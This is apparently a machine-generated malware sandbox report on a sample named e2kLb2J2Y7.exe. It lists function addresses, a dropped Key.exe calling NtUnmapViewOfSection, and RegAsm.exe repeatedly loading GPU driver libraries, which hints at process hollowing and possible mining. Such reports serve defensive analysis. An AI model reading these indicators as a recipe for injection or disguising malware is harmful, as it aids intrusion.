Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F9320 22_2_00000001402F9320
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F6B50 22_2_00000001402F6B50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140303B40 22_2_0000000140303B40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140301330 22_2_0000000140301330
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEB6B 22_2_00000001402EEB6B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1BD0 22_2_00000001402F1BD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EF3E0 22_2_00000001402EF3E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403133B0 22_2_00000001403133B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC410 22_2_00000001402EC410
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403033F0 22_2_00000001403033F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F7460 22_2_00000001402F7460
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E7C60 22_2_00000001402E7C60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB440 22_2_00000001402EB440
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140313430 22_2_0000000140313430
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402ECD50 22_2_00000001402ECD50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140302D30 22_2_0000000140302D30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140311D70 22_2_0000000140311D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E75B0 22_2_00000001402E75B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E760F 22_2_00000001402E760F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEDFA 22_2_00000001402EEDFA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140305E40 22_2_0000000140305E40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1E70 22_2_00000001402F1E70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E6E70 22_2_00000001402E6E70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F66D0 22_2_00000001402F66D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402FBEB0 22_2_00000001402FBEB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EBEC0 22_2_00000001402EBEC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F2720 22_2_00000001402F2720
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140302710 22_2_0000000140302710
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F8EF0 22_2_00000001402F8EF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB6E1 22_2_00000001402EB6E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EEF00 22_2_00000001402EEF00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402ECF80 22_2_00000001402ECF80
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402475E0 22_2_00000001402475E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014024D650 22_2_000000014024D650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140365C10 22_2_0000000140365C10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DD0C0 22_2_00000001401DD0C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DD4E0 22_2_00000001401DD4E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DC4C3 22_2_00000001401DC4C3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DDD60 22_2_00000001401DDD60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DE960 22_2_00000001401DE960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D8957 22_2_00000001401D8957
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DA946 22_2_00000001401DA946
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DA562 22_2_00000001401DA562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401E01F0 22_2_00000001401E01F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D9EAA 22_2_00000001401D9EAA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D878E 22_2_00000001401D878E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401E93C0 22_2_00000001401E93C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DC3D9 22_2_00000001401DC3D9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034185F 22_2_000000014034185F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140343A30 22_2_0000000140343A30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014033BA30 22_2_000000014033BA30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032C020 22_2_000000014032C020
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140331800 22_2_0000000140331800
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034189B 22_2_000000014034189B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034187F 22_2_000000014034187F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403420F0 22_2_00000001403420F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403414F0 22_2_00000001403414F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032B980 22_2_000000014032B980
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140330650 22_2_0000000140330650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032F240 22_2_000000014032F240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140343780 22_2_0000000140343780
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140164D50 22_2_0000000140164D50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140143550 22_2_0000000140143550
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140164F70 22_2_0000000140164F70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140165190 22_2_0000000140165190
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401653B0 22_2_00000001401653B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D3000 22_2_00000001401D3000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D4CA0 22_2_00000001401D4CA0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A31A51 NtUnmapViewOfSection, 4_2_00007FFD34A31A51
Source: e2kLb2J2Y7.exe Static PE information: No import functions for PE file found
Source: Key.exe.0.dr Static PE information: No import functions for PE file found
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2112901867.00000000034C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013D32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxx.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: nvapi64.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
